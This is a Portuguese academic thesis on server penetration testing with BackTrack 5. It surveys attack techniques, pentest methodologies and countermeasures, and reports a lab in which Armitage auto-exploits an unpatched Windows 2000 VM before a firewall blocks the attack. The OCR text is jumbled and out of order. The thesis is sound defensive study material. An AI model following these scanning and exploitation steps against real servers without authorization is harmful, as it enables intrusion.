53. ir a confiabilidade dos resultados Entretanto tamb m sabido que a grande maioria das empresas utilza um m todo pr prio cap tulo 2 portanto neste teste n o ser diferente Sendo que o grande objetivo exatamente testar uma distribui o nova o Backtrack 5 e descobrir se o administrador de rede conhecendo as ferramentas do sistema pode melhorar a seguran a de seus servidores e com 41 isso evitar uma possivel intrusao foram analisadas as tradicionais metodologias ja citadas no capitulo 2 e ousamos nao criar uma nova metodologia mas sim simplifica la para a aplicagao dos testes realizados neste trabalho 3 1 1 Coleta de Informa es A primeira etapa de qualquer teste de penetra o a coleta de informa es sobre o alvo Nesta fase deve ser coletado o m ximo de informa es sobre a empresa ramo de atividade s cios servidores servi os dispon veis faixa de IP utilizada etc Para esta finalidade existem diversas ferramentas j citadas no cap tulo1 e tudo depende do tipo de testes que ser realizado que pode ser com o conhecimento e colabora o do administrador da rede o que deixa tudo mais f cil ou sem o seu conhecimento o que dificulta a coleta de informa es entretanto especificamente neste trabalho alguns passos desta fase foram suprimidos visto que estamos considerando que quem est aplicando os testes o pr prio administrador do servidor e que ja se conhece suas caracter sticas IP servi
54. itoram conex es estabelecidas ASSUN O 2010 Vale lembrar que a ferramenta Nmap tamb m faz scan de UDP pois apesar de serem raras existem algumas brechas de seguran a em servi os Linux que podem ser exploradas atrav s de porta UDP al m disso a maioria dos firewall configurada apenas para bloquear as portas TCP ASSUN O 2010 J para a varredura de vulnerabilidades falhas de seguran a a ferramenta mais utilizada o nessus a qual faz a varredura do servidor verificando se existe alguma falha no servidor e principalmente se o servidor n o foi atualizado e a falha for antiga j documentada Dessa maneira a pr pria ferramenta sugere um exploit 23 programa que se aproveita das vulnerabilidades de um servi o ou sistema operacional que possa se aproveitar dessa vulnerabilidade Al m disso o nessus uma das ferramentas muito utilizadas pelos invasores pois em sua varredura envia pacotes para todas as portas TCP e UDP e ap s verificar se a mesma esta aberta envia um script para analisar a vulnerabilidade e ent o mostra o nivel de alerta uma descri o detalhada da vulnerabilidade e a solu o para o problema que na maioria dos casos a atualiza o do sistema NESSUS 2012 1 2 T CNICAS DE PENETRA O Os tipos ou t cnicas de penetra o de um servidor de rede s o as mais diversas poss veis uma das mais conhecidas o chamado Cavalo de troia ou ainda Trojan Na maioria das vezes esse ti
55. licativos e utilit rios utilizados diariamente pelo sistema por quaisquer outras fun es que o invasor solicitar que estes aplicativos ferramentas ou utilit rios fa am Os rootkits mais comuns fazem basicamente quatro coisas a abrir um backdoor permanente ou ativado por um c digo b mentir sobre o estado do sistema c apagar ou destruir alguma coisa d descobrir senhas e informa es sigilosas ULBRICH e VALLE 2004 p 321 Seguindo o racioc nio de Ulbrich e Valle 2004 n o nada f cil identificar os rootkits teoricamente o administrador da rede conseguiria identificar alguma atividade suspeita ou fora do normal com o comando netstat que utilizado pra monitorar as conex es de entrada e sa da e v rias outras informa es estat sticas 28 de utiliza o de uma rede Entretanto se o comando estiver rootkitted ou melhor dizendo com seu formato original alterado por algum rootkit suas fun es normais n o ser o executadas corretamente e informa es como portas abertas estariam ocultadas Uma forma de se identificar se existem rootkits executando em sua rede observar algumas caracter sticas que podem mostrar que aquele programa foi alterado como data de cria o diferente dos demais programas o tamanho do arquivo modificado tamb m pode ser diferente do programa original pois o arquivo rootkitted possui algumas linhas mais de comando implementadas dentro dele Outra forma tamb m adotada pelos administrador
56. lnerabilidades Esta framework possui um banco de dados com as vulnerabilidades j conhecidas e outro banco com os exploits criados para aproveitar tais vulnerabilidades e instalar o payload Este payload um algoritmo malicioso desenvolvido por experts com profundo conhecimento de programa o Estes experts estudam as vulnerabilidades existentes em cada servi o e ou sistemas operacionais e desenvolvem o exploit que de fato explora a falha e estabelece a conex o entre atacante e alvo da a import ncia de manter o Backtrack e consequentemente o metasploit constantemente atualizados baixando 46 para seu banco de dados todas as novas descobertas sobre vulnerabilidades bem como os exploits utilizados para explor las BACKTRACK 2012 3 3 CENARIO DE TESTES Para a aplica o dos testes foi criado um cen rio com tr s m quinas virtuais utilizando o Virtual Box da Oracle como se estivessem em uma rede exclusiva como mostra figura 3 3 Topologia do Ambiente de Testes Ubuntu 12 10 Alvo 2 10 0 2 17 Internet Pm gt 10 0 2 15 gt q dj stilbi BackTrack 5 r3 Atacante 10 0 2 16 lt a Windows 2000 Server Alvo 1 Figura 3 3 Topologia da rede virtual de testes de penetra o Fonte Elaborado pelos autores 2012 Computadores utilizados M quina atacante Distribui o linux Backtrack 5 r3 criada em uma maquina virtual utilizando o Oracle Virtual Box
57. lnerabilidades sejam encontradas o hacker dever estudar todo o c digo linha por linha para que possa alcan ar sucesso em seu ataque Vieira 2011 1 4 T CNICAS PARA MANTER O ACESSO E APAGAR RASTROS Segundo Ulbrich e Valle 2004 e SmiTh 2005 ap s o sistema ser invadido o atacante procura uma forma de voltar quele sistema sem ser notado e sem precisar do mesmo esfor o ou trabalho gasto para invad lo pela primeira vez Uma das formas do hacker manter seus registros dentro do sistema instalando novos servi os ou alterando algum servi o j existente para um tipo de servi o que ele desejar Estas configura es realizadas normalmente s o para se manter um acesso remoto ao sistema e esse tipo de ataque conhecido como backdoor ou porta dos fundos pois deixa uma porta aberta para os invasores voltarem assim que quiserem Uma backdoor pode ser implantada em v rios sistemas operacionais tais como os que utilizam a plataforma Windows Unix e Mac OS Ulbrich e Valle 2004 ainda afirmam que mesmo ap s a invas o e instala o de ferramentas ou altera o de c digos que permitam acesso remoto ao sistema e o retorno do invasor necess rio que estas altera es sejam camufladas para que n o sejam detectadas pelo administrador da rede ou por poss veis ferramentas de auditorias no sistema Uma forma eficaz de se fazer isto com a utiliza o dos rootkits que s o programas que alteram o funcionamento de ferramentas ap
58. m SYN acknowledge ACK e o invasor por sua vez confirma a conex o enviando um ACK LIEIRA 2011 Esta t cnica funciona bem mas pode ser facilmente detectada pois na realidade fez uma conex o normal e gera log no servidor Temos tamb m a t cnica TCP SYN SCAN que age basicamente como a t cnica anterior mas n o faz o handshake completo o atacante envia um SYN o servidor responde com SYN ACK e o atacante responde com reset RST ACK ou seja n o gera conex o sendo portanto mais dif cil de ser detectada Existe ainda varredura de portas com UDP SCAN que funciona de forma parecida com os de TCP entretanto UDP n o baseado em conex o e por isso funciona da seguinte forma envia um pacote para as portas UDP e se elas estiverem fechadas o servidor retorna com a mensagem ICMP port unreachable e se n o houver esta resposta pressup e se que exista uma aplica o rodando nesta porta LIEIRA 2011 Para essa varredura a ferramenta mais usada o Nmap uma ferramenta de portscan de uso geral que ajuda a detectar portas abertas tanto na rede local como via internet o que o Nmap faz basicamente o que foi dito nas t cnicas acima por m com algumas particularidades por exemplo no caso da consulta o Nmap envia pacotes SYN para todas as portas do alvo e espera para receber o retorno ACK de confirma o mas n o envia o segundo pacote ACK que abriria a conex o isso dificulta a detec o de intrus o nos sistemas que s mon
59. mando para as m quinas masters que por sua vez mandam um comando para as m quinas agentes dizendo que podem atacar Estas por fim enviam um bombardeio de pacotes ao servidor alvo Segundo Smith 2005 muito dif cil detectar esse tipo de ataque por serem feitos por meio de criptografia por m n o imposs vel Pode se identific los por meio de auditorias ferramentas de detec o espec ficas e sistemas de detec o de introdu o 31 Ainda seguindo o raciocinio de Smith 2005 para se prevenir de ataques de DDoS recomenda se aumentar a seguran a no host sempre manter os patches do sistema atualizados instalar filtros anti spoofing j que os DDoS utilizam de spoofing para tentar ocultar os endere os Ps de onde vem o ataque Utilizar roteadores que permitam limitar a banda por tipo de tr fego como por exemplo os roteadores CISCO que possuem um recurso que permite limitar a banda que poder ser consumida por esses tipos de pacotes prevenir que sua rede seja utilizada para envio de pacotes a endere os de broadcasting implementando diretivas nos roteadores impedindo os recebimentos desses tipos de pacotes Segundo Smith 2005 como n o existe sistemas conectados a internet que estejam totalmente seguros uma das formas de se manter prevenido ter um bom plano de conting ncia procedimentos de rea o bem claros e espec ficos e tamb m administradores de rede treinados e qualificados para agir o mais r pido poss vel qua
60. map Nmap OS and Service detection performed Please report any incorrect results at http nmap org submit Nmap Nmap done 1 IP address 1 host up scanned in 127 18 seconds Nmap Raw packets sent 1033 46 864KB Rcvd 1033 42 220KB msf gt Pr root bt Figura 3 12 Tela de final de scan Fonte Elaborado pelos autores 2012 10 Observe que apareceu o PC do Windows como um Host Para explorar suas vulnerabilidades acesse o menu Attacks gt Hail Mary plications Places System gt C Wed Nov 7 11 13 AM Console X nmap X Nmap GRUPU lt 10 gt Flags lt unique gt lt active gt Nmap _ x 1 x02__MSBROWSE__ x02 lt 01 gt Flags lt group gt lt active gt Nmap _smbv2 enabled Server doesn t support SMBv2 protocol Nmap TRACEROUTE Nmap HOP RIT ADDRESS Nmap 1 0 47 ms 10 0 2 16 Nmap NSE Script Post scanning Nmap Read data files from opt metasploit common share nmap Nmap OS and Service detection performed Please report any incorrect results at p nmap org submit Nmap Nmap done 1 IP address 1 host up scanned in 127 18 seconds Nmap Raw packets sent 1033 46 864KB Rcvd 1033 42 220KB msf gt root bt E Armitage Figura 3 13 Iniciando aplica o de exploits Fonte Elaborado pelos autores 2012 11 Aguarde enquanto o Armitage encontra um Exploit para aplicar no PC Windows PZ Wed Nov 7 11 13 AM
61. merate Clear Database Quick Scan OS detect Comprehensive Console x 927 exploits 499 auxiliary 151 post 28 encoders 8 nops s E root bt m Armitage Figura 3 10 Tela do Intensive Scan no Bactrack 5 r3 Fonte Elaborado pelos autores 2012 50 8 Nesta janela digite o IP do Windows 10 0 2 16 e clique em OK Places Syster Wed Nov 7 11 09 AM Armitage View Hosts Attacks Workspaces Help 8 auxiliary gt B exploit gt payload gt post Enter scan range e g 192 168 1 0 24 10 0 2 16 Console X ROK Cancel 927 exploits 499 auxiliary 151 post s P3 root bt Armitage Figura 3 11 Campo de IP do Intensive Scan no Bactrack 5 r3 Fonte Elaborado pelos autores 2012 9 Aguardar at o Scan Complete e clique em OK Wed Nov 7 11 12 AM auxiliary a exploit gt 8 payload gt 5 post E Message Scan Complete Use Attacks gt Find Attacks to suggest applicable exploits for your targets Console X nmap X Tr Nmap GRUPU lt 10 gt Nmap x01 x02__MS Nmap _smbv2 enabled Server doesn t support SMBv2 protocol Nmap TRACEROUTE Nmap HOP RIT ADDRESS Nmap 1 0 47 ms 10 0 2 16 Nmap NSE Script Post scanning J J Nmap Read data files from opt metasploit common share n
62. milia e a minha namorada Louise que tem me apoiado durante toda esta jornada Jean Karl da Silveira A minha esposa Val ria e filhos Felipe e Mariana que me dedicam tanto amor e carinho incentivando me nessa jornada e aos meus Pais Mario e Teresa a quem tudo devo Mario Fernandes Testoni Junior AGRADECIMENTOS Inicialmente agrade o a Deus que me conduziu durante todo este rduo e longo trajeto dando me condi es e capacitando me para a conquista e realiza o deste sonho Gostaria de agradecer tamb m ao meu orientador Me Julio Fernando Lieira pela paci ncia para sanar minhas d vidas e pelo comprometimento para com o meu trabalho o que sem d vidas foi pe a fundamental para a sua conclus o Agrade o n o somente a ele mas a todos os professores e colegas que desde o primeiro semestre me ajudaram e acrescentaram conhecimento a minha vida Sou muito grato ao meu parceiro Mario Fernandes Testoni Junior por complementar minhas id ias se comprometer com o projeto pela for a de vontade para concluir este trabalho e pelo incentivo que me passava nas horas em que pensei em desanimar Agrade o minha fam lia e minha namorada que muitas vezes me incentivou e me apoiou durante todo este per odo E por fim agrade o a todos que direta ou indiretamente participaram ou contribu ram para a conclus o deste trabalho Jean Karl da Silveira AGRADECIMENTOS Ao final da realiza o de mais um sonho e inicio de uma
63. ndo ocorrer esse tipo de imprevisto tamb m necess rio que estes administradores de rede tamb m mantenham um monitoramento constante da rede e processos que estejam executando em sua rede 32 2 METODOLOGIAS DE TESTE DE PENETRACAO Para a realiza o de testes de penetra o o conhecimento dos tipos de ataque e das ferramentas utilizadas de extrema importancia entretanto necessario muito mais que isso Para que um teste seja confiavel preciso que seja feito seguindo uma metodologia que segundo o Dicion rio Silveira Bueno 2000 p 510 significa tratado dos m todos e m todo ordem que se segue na investiga o da verdade Portanto entende se que metodologia no conceito de teste de penetra o seja um conjunto de procedimentos a serem seguidos durante os testes de vulnerabilidades e ataque para que desta forma o mesmo teste pode ser repetido e at comparado Caso seja realizado utilizando t ticas diferentes e sem ser documentado ser considerado como mera tentativa de invas o e perde seu valor quanto a confiabilidade dos resultados descaracterizando o Pentest e configurando apenas uma tentativa de ataque BORGES 2011 Nesta linha de racioc nio e para que haja confiabilidade dos resultados foram criadas por organiza es da rea de seguran a diversas metodologias Neste cap tulo trataremos das mais utilizadas entretanto segundo Borges 2011 94 das empresas utilizam mais de uma metodologia quando
64. necess rio e a maioria delas usam tamb m uma metodologia propriet ria o que deixa evidente a car ncia de metodologias que resolvam cem por cento dos problemas 2 1 NIST A metodologia NIST foi disponibilizada em setembro de 2008 pelo Departamento de Com rcio dos Estados Unidos e obrigat rio em diversos departamentos americanos por m pode ser usado livremente por empresas do mundo todo Para obter o m ximo proveito dos testes t cnicos de seguran a o NIST sugere que inicialmente se estabele a uma pol tica de seguran a de avalia es que se definam os objetivos de cada avalia o de seguran a tentando alcan los e que logo ap s sejam analisadas as descobertas para que se possa sanar as vulnerabilidades e minimizar os riscos NIST 2008 A proposta principal desta metodologia n o a de informar qual a t cnica a ser utilizada nos testes at porque existem diversas e seus objetivos s o basicamente os mesmos Ent o o que a metodologia prop e orientar no 33 planejamento e aplica o dos testes de seguran a da informa o an lise das descobertas e desenvolvimento de estrat gias de mitiga o ou seja a id ia principal especificar como utilizar as diversas t cnicas para alcan ar a efetividade dos testes NIST 2008 Assim como todas as metodologias estudadas o documento completo bem detalhado no caso do NIST 80 p ginas entretanto neste trabalho relatamos apenas os t picos b sicos de cad
65. nta Fping no Backtrack 5 Fonte Elaborado pelos Autores 2012 O resultado figura 1 2 mostra que foi pesquisada a faixa de IP 173 194 74 83 173 194 74 191 e que alguns est o ativos alive note que existem intervalos por exemplo entre os IP 173 194 74 108 e 173 194 74 118 que n o responderam por estarem inativos ou protegidos por regras de firewall para n o responder a este tipo de consulta 20 1 1 3 Tra ando a Rota at os Servidores Ainda na linha de pesquisa sobre o alvo existem mais duas ferramentas extremante importantes para a obten o de informa es sobre o alvo s o elas o Traceroute e o Nmap O Traceroute utilizado para determinar o caminho at o servidor alvo importante saber por onde passam os pacotes at chegarem ao destino e se neste caminho existe algum firewall ou filtro de pacotes Na verdade o Traceroute foi criado para auxiliar o administrador de rede a diagnosticar falhas na rede entretanto devido a sua funcionalidade muito usado por hackers para conhecer a topologia da rede e descobrir a exist ncia de filtros ou firewall at o destino alvo O Traceroute utiliza o Time To Live TTL de um pacote IP esta fun o cont m a quantidade de roteadores por onde passa o pacote at chegar ao destino Quando o pacote passa por um roteador o TTL decrementado em 1 se o TTL chegar a O o roteador descarta o pacote e envia uma mensagem m quina que o originou assim o que o Traceroute faz en
66. ntos considerados extremamente importantes para realiza o de teste de penetra o em servidores importante esclarecer que este um trabalho acad mico para conclus o de curso e que seus autores condenam todo e qualquer tipo de teste em servidores sem autoriza o por escrito do respons vel pelo sistema alvo segundo os testes aqui realizados foram feitos em servidores especialmente montados e configurados para esta fun o teste de penetra o N o recomendado que os testes e aplica o de exploits seja feito diretamente em um servidor em uso ativo uma vez que a aplica o dos testes vai consumir banda da conex o e al m disso quando da varredura de portas o software utilizado far com que o servidor responda a diversas requisi es feitas pelo sistema que realiza a referida varredura o que com certeza causar queda significativa no desempenho do servidor podendo tamb m dependendo do exploit causar a paralisa o crash de servi os ou at mesmo do pr prio servidor Assim sendo recomenda se que os testes sejam aplicados em uma c pia do servidor e de prefer ncia utilizando m quinas virtuais para que assim evite tr fego desnecess rio na rede do servidor a menos que se conhe am todos os riscos e sejam assumidas todas as responsabilidades pelos danos que possam ser causados em virtude dos testes 3 1 ETAPAS DO TESTE Como j tratado anteriormente todo teste deve seguir uma metodologia para garant
67. o o sevidor invadido 53 Figura 3 17 rvore de arquivos do sevidor invadido aa 54 Figura 3 18 Pasta C do servidor Windows 54 Figura 3 19 Criando arquivo txt NO Backtrack 55 Figura 3 20 Enviando arquivo ao sevidor invadido 55 Figura 3 21 Tela com arquivo enviado ao servidor 56 Figura 3 22 Tela do sistema atualizado Service pack 4 57 Figura 3 23 Aplicando exploits no sistema atualizado 57 Figura 3 24 Nenhuma vulnerabilidade encontrada 58 Figura 3 25 Armitage tentando aplicar exploits no servidor Ubuntu 58 Figura 3 26 Resultado da tentativa de invas o com exploilts 59 Figura 3 27 Topologia do novo teste utilizando Firewall 60 LISTA DE ABREVIATURAS E SIGLAS ACK Acknowledge CERT Centro de Estudos Respostas e Tratamento de Incidentes de Seguran a no Brasil ICMP Internet Control Message Protocol IP Internet Protocol ISECOM Institute for Security and Open Methodologies ISSAF Information Systems Security Assessment Framework PenTest Teste de Penetra o invas o em Sistemas Informatizados VM
68. o servidor alvo 1 foi propositalmente deixada de lado para ilustrar que a grande fonte de vulnerabilidades em servidores atualmente a falta de atualiza o dos sistemas e servi os e a m configura o dos mesmos o que s vezes pelas atribula es do dia a dia passa despercebida pelo administrador que s ir notar a falha ap s uma invas o quando na verdade j tarde demais 3 7 TESTANDO A PROTE O DE UM FIREWALL Como visto no item 3 4 quando o servidor web estava sem a atualiza o sugerida pelo fornecedor e de frente para a internet os testes realizados mostraram as vulnerabilidades e foi poss vel a invas o Como a inten o deste estudo mitigar 60 Os riscos e ajudar o administrador a proteger sua rede uma nova bateria de testes foi realizada por m desta vez testando a efici ncia de um firewall Para tanto um novo cenario foi criado incluindo uma outra maquina que funcionara como firewall da rede filtrando pacotes indesejados e liberando apenas o que realmente interessar a rede A figura 3 27 ilustra a topologia da rede no novo teste Topologia da Rede Utilizando Firewall 192 168 55 2 s 10 10 100 54 192 168 55 1 9 Internet aL Firewall Debian 10 10 100 15 ad BackTrack 5 r3 Figura 3 27 Topologia do novo teste utilizando Firewall Fonte Elaborado pelos autores 2012 A figura mostra a topologia com o firewall conectado n vem internet como de fato estaria em um ambiente r
69. onsulta al m disso uma contramedida pode ser facilmente implementada controlando as respostas ICMP e ou limitando as atrav s de um firewall x root bt File Edit View Terminal Help fping g 173 194 74 83 173 194 74 191 173 194 74 88 is alive lt 173 194 74 83 173 194 74 89 is alive lt 173 194 74 84 173 194 74 90 is alive lt 173 194 74 85 173 194 74 91 is alive lt 173 194 74 86 173 194 74 93 is alive lt 173 194 74 87 173 194 74 101 is alive lt 173 194 74 95 173 194 74 102 is alive lt 173 194 74 96 173 194 74 103 is alive lt 173 194 74 97 173 194 74 103 duplicate for 0 92 bytes 195 ms lt 173 194 74 98 173 194 74 104 is alive lt 173 194 74 99 173 194 74 107 is alive lt 173 194 74 100 173 194 74 107 duplicate for 0 92 bytes 240 ms lt 173 194 74 101 173 194 74 107 duplicate for 0 92 bytes 211 ms lt 173 194 74 102 173 194 74 108 is alive lt 173 194 74 103 173 194 74 118 is alive lt 173 194 74 112 173 194 74 119 is alive lt 173 194 74 113 173 194 74 120 is alive lt 173 194 74 114 173 194 74 121 is alive lt 173 194 74 115 173 194 74 122 is alive lt 173 194 74 116 173 194 74 123 is alive lt 173 194 74 117 173 194 74 134 is alive lt 173 194 74 128 173 194 74 135 is alive lt 173 194 74 129 173 194 74 137 is alive lt 173 194 74 132 y Figura 1 2 Resultado da ferrame
70. orma autom tica at que se descubra o nome do usu rio e a senha ASSUN O 2010 24 Esse tipo de ataque pode ser utilizado se o atacante descobre que o servidor tem rodando um servi o Secure Shell SSH por exemplo pois uma vez que tenha acesso vai precisar somente ter permiss o de supervisor e consolidar o ataque Este ataque facilmente detectado se o administrador do sistema verificar o arquivo de log onde ficar gravado cada tentativa de acesso ASSUN O 2010 Para tentar impedir este tipo de ataque existem algumas medidas que podem ser tomadas e que dificultar o a possibilidade de sucesso do atacante A primeira delas garantir que todas as contas tenham senha e que estas sejam trocadas periodicamente e que tenham um n mero m nimo de caracteres al m claro de verificar sempre se algum aplicativo criou uma conta padr o e configurar um sistema de alertas quando houver v rias tentativas de senhas erradas ASSUN O 2010 Ainda sobre tipos de ataques destacamos o chamado Buffer Overflow tamb m chamado de estouro de pilha ou estouro de buffer que consiste em explorar falhas de programa o ele age da seguinte forma suponha que um determinado programa em sua rotina criou um buffer com 10 caracteres e seja enviado para ele um texto contendo 25 caracteres como ele tem falhas e n o verifica o tamanho do espa o dispon vel isso gera um estouro de buffer e a que o atacante inclui um c digo personalizado
71. ou sistema esta vulneravel o profissional tem que utilizar basicamente as mesmas t cnicas e ferramentas que ser o utilizadas pelo invasor hacker ou craker Neste contexto este trabalho realizou um estudo de metodologias e ferramentas de teste de penetra o em servidores de rede Especificamente nesta pesquisa apresentado um estudo sobre a distribui o Linux focada em teste de seguran a e de penetra o denominado Backtrack que se encontra na vers o 5 0 r3 e que foi escolhida por ser uma distribui o nova e que tem um grande n mero de ferramentas automatizadas que se bem utilizada pode facilitar o trabalho do administrador visando concluir que se conhecendo as formas de ataques a servidores e as ferramentas utilizadas pelos invasores o administrador da rede poder utiliz las para fortalecer a seguran a de seus pr prios servidores O primeiro cap tulo aborda as t cnicas de ataque a servidores de rede quais os principais tipos de ataque que os servidores podem sofrer mostrando seu funcionamento e prop sitos bem como as contramedidas para minimizar os riscos de modo a n o afetar a continuidade dos neg cios da empresa Em seguida no segundo cap tulo s o discutidas algumas metodologias para a aplica o do teste de penetra o tais como Open Source Secutory Testing Methodology Manual OSSTMM Open Web Application Security Project OWASP Information Systems Security Assessment Framework ISSAF e National Institu
72. po de ataque usando Trojan direcionado a desktops entretanto n o podemos descartar a possibilidade de serem utilizados contra servidores Os Trojan s o basicamente arquivos aparentemente sem perigo algum que cont m em seu interior um c digo malicioso que ir agir ap s instalado na m quina e por isso podem ser adicionados a um pacote compactado de atualiza o de algum aplicativo por exemplo ASSUN O 2010 Uma vez que o administrador baixa este arquivo para dentro de seu computador e faz a descompacta o do mesmo o arquivo malicioso instalado de forma oculta e a partir da faz o que foi estabelecido pelo atacante sem deixar rastros que possam ser facilmente detectados ASSUN O 2010 Outro tipo de ataque o conhecido como for a bruta ou brutal force Todo sistema com acesso restrito geralmente utiliza um nome de usu rio e senha para acesso o que a t cnica de for a bruta faz tentar de forma aleat ria descobrir esta informa o tentando logar diversas vezes com nomes e senhas diferentes ASSUN O 2010 Da a necessidade de obter o m ximo poss vel de informa es sobre o alvo e neste caso principalmente com o uso da engenharia social pois sabendo algumas informa es sobre o usu rio poss vel criar uma lista com os poss veis nomes de usu rios e senhas ou utilizar as lista prontas da ferramenta chamadas de wordlist que cont m palavras comuns muito usadas como senhas e deixar o ataque rodando de f
73. que t m seus sistemas conectados de alguma forma a internet tenha um cuidado redobrado com a seguran a de seus dados pois a c pia n o autorizada roubo exclus o perda ou altera o modifica o de informa es pode causar grandes preju zos financeiros comprometendo dessa forma no futuro da empresa Entretanto o lado financeiro n o o maior prejudicado por uma invas o pois se um invasor alterar os dados do projeto de algum equipamento de seguran a ou a composi o de um medicamento ou ainda a de um sistema que controla m quinas e v lvulas em ind strias vidas poder o ser perdidas at que a falha seja corrigida Como vimos a seguran a em servidores requer aten o e dedica o de profissionais capacitados Diante disso e como as empresas de uma forma ou de outra precisam de conex es com filiais ou com fornecedores e clientes torna se quase imposs vel manter seus servidores completamente isolados Sabendo tamb m que n o existe um sistema de seguran a ou antiv rus que garanta cem por cento de confiabilidade 15 as empresas passaram a buscar no mercado profissionais capacitados a detectar possiveis pontos vulneraveis em seus servidores e criar obstaculos dificultando a invasao de pessoas nao autorizadas Assim nasceu o conceito de pentest ou teste de penetra o O profissional desta area deve ser profundo conhecedor das t cnicas e ferramentas utilizadas pelo invasor ou seja para saber se seu servidor
74. rk Draft ISSAF 0 2 1 B 2006 Dispon vel em lt http www oissg org downloads issaf 0 2 index php gt Acesso em 13 jul 2012 OWASP Open Web Application Security Project OWASP Testing Guide v3 0 2008 Dispon vel em lt https www owasp org images 5 56 0WASP Testing Guide v3 pdf gt Acesso em 23 jul 2012 67 SANTOS E Avaliando a Import ncia das Metodologias para Aplica o de Testes de Seguran a em Sistemas de Informa o 2010 108p TCC Instituto Federal de Santa Catarina Santa Catarina Disponivel em lt http Avww inf ufsc br esantos files TCC EduardoDosSantos pdf gt Acesso em 23 jul 2012 SMITH EBook hackers secrets and confessions 4Shared 25 mai 2005 Dispon vel em lt http www 4shared com office KqRApmX eBook_Hackers_Secrets_And_Conf html gt Acesso em 25 mai 2012 SYMANTEC Gloss rio De Seguran a Security 101 2012 Dispon vel em lt http www symantec com pt br business theme jsp themeid glossario de seguranca gt Acesso em 10 mai 2012 ULBRICH H C VALLE J D Universidade Hacker 4 ed Sao Paulo Digerati 2004 VIEIRA L LINUX Eleva o de privil gios locais Artigo Viva o Linux 21 mar o 2011 Disponivel em lt http www vivaolinux com br artigo Elevacao de privilegios locais gt Acesso em 22 maio 2012 68 GLOSSARIO Este Glossario foi criado em conformidade com SYMANTEC 2011 e CGIBR 2006 contendo os termos t cnicos utilizados do trabalho com
75. s em sua busca por melhoria na seguran a entretanto ficou claro que esta n o deve ser a nica fonte de recurso para tal finalidade Palavras chave Pentest backtrack seguran a servidor ABSTRACT The Objective of this study was to know the most common types of attacks to servers the techniques and tools used by invaders for obtain information about the target and the possible invasion attempt also was made a brief report on the methodologies used to penetration testing We also sought to know the Backtrack 5 r3 which is a Linux distribution focused on security testing and penetration to conclude if a network administrator with this knowledge can test and strengthen the security of their own servers To that end we created a test environment with two virtualized servers one running Windows 2000 server operating system and another with linux Ubuntu 12 10 and then applied the knowledge gained to prove its efficiency through Backtrack Finally it was concluded that the tool has proved a good ally to the network administrator in your quest for improved security however it became clear that this should not be the only source of funds for this purpose Keywords Pentest backtrack security server LISTA DE ILUSTRA ES Figura 1 1 Resultado da ferramenta Dnsmap no Backtrack 5 18 Figura 1 2 Resultado da ferramenta Fping no Backtrack 5 19 Figura 1 3 Resultado da
76. te of Standards and Technology NIST No terceiro e ltimo cap tulo tratou se da aplica o da distribui o linux BackTrack no teste de penetra o de servidores de rede e para tanto um cen rio foi criado e os testes guiados por uma metodologia 16 1 TECNICAS DE ATAQUES A SERVIDORES DE REDE Este capitulo trata das t cnicas de ataques a servidores portanto vale lembrar que um invasor antes de iniciar o ataque e a possivel invasao busca primeiramente munir se de informa es sobre seu alvo informa es estas que s o adquiridas das mais diversas formas e utilizando variadas ferramentas por m a engenharia social foi e continua sendo uma das t cnicas mais utilizadas para esta finalidade Ela consiste em nada menos do que retirar informa es de forma social das pessoas que por suas fun es dentro da institui o alvo s o portadoras de conhecimento que interessa ao atacante o engenheiro social faz isso aproveitando se das fraquezas humanas de forma inescrupulosa ou seja o atacante utiliza seu poder de convencimento as vezes se fazendo passar por outra pessoa assumindo um personagem para retirar informa es de maneira sutil por m eficiente de outras pessoas mesmo que para isso seja necess rio mexer com os sentimentos da pessoa investigada MITNICK 2006 O engenheiro social emprega as mesmas t cnicas persuasivas que usamos no dia a dia Assumimos pap is tentamos obter credibilidade Cobramos obriga
77. teis e com alguma funcionalidade por m esconde programas nocivos que p e em risco a seguran a das informa es V RUS Programa escrito para alterar a maneira como um computador opera sem a permiss o ou conhecimento do usu rio Deve atender a dois crit rios executar a si mesmo e auto replicar VULNERABILIDADE uma falha no projeto implementa o ou configura o de um software ou sistema operacional que quando explorada por um atacante resulta na viola o da seguran a de um computador 72 WORM Programa capaz de se propagar automaticamente atrav s de redes enviando c pias de si mesmo de computador para computador Diferente do virus o worm nao embute c pias de si mesmo em outros programas ou arquivos e nao necessita ser explicitamente executado para se propagar Sua propaga o se da por meio da explora o de vulnerabilidades existentes ou falhas na configura o de softwares instalados em computadores
78. tema operacional e como pode ser notado pela figura 3 30 n o foi poss vel a intrus o no servidor Web No active sessions Portanto fica claro a import ncia de um firewall na prote o de servidores 63 por m vale lembrar que deve ser um firewall bem configurado e testado caso contrario pode se ter a falsa no o de seguran a o que de certa forma facilita o ataque Applications Places o x Armitage gt auxiliary gt E exploit E payload gt BB post 10 10 100 54 Console X nmap X Nmap Completed NSE at 21 20 2 15s elapsed Nmap Nmap scan report for 10 10 100 54 Nmap Host is up 0 0027s Latency Nmap Not shown 999 filtered ports Nmap PORT STATE SERVICE VERSION Nmap 80 tcp open http Microsoft IIS httpd 5 0 Nmap http title Site doesn t have a title text html Nmap http methods OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH Potentially risky methods TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE E root bt a Armitage l Eel Figura 3 29 Resultado parcial do Armitage no teste com firewall Fonte elaborado pelos autores 2012 Applications Places System v x Armitage gt EB auxiliary gt EB exploit gt payload E post 10 10 100 54 av Console X nmap X Hail Mary X 4 Listing sessions msf gt sessions v Active sessions No active sessions
79. uais softwares quais vers es e quais vulnerabilidades tanto dos softwares quando dos sistemas operacionais al m claro de nomes de usu rios e senhas cadastradas no servidor ASSUN O 2010 Obviamente estas n o s o informa es f ceis de conseguir e exatamente por isso que foram criadas as ferramentas que ser o citadas a seguir entretanto quanto mais informa es melhor para o atacante pois com base nelas que ser o determinadas as etapas seguintes ASSUN O 2010 1 1 1 Vasculhando Informa es nos Servidores DNS Domain Name System DNS ou Sistema de Nomes de Dom nios um protocolo na internet e a fun o do servidor DNS traduzir um nome como WWW xxx com br em endere o de IP do computador que realmente roda o servi o que se est tentando acessar Como mais f cil decorar um nome do que um n mero do endere o IP o DNS torna se um servi o essencial da internet assim quando digitado um dom nio em um navegador este faz uma consulta ao servidor DNS visando resolver este nome ou seja saber qual o endere o IP do computador que roda o servi o para na sequ ncia buscar por ele na rede e mostrar a informa o solicitada FAIRCLOTH 2011 Assim sendo uma das primeiras pesquisas que devem ser realizadas pelo atacante a consulta ao servidor DNS para saber quais os endere os IP est o de frente para internet e configurados para rodar algum tipo de servi o Para essa pesquisa existem div
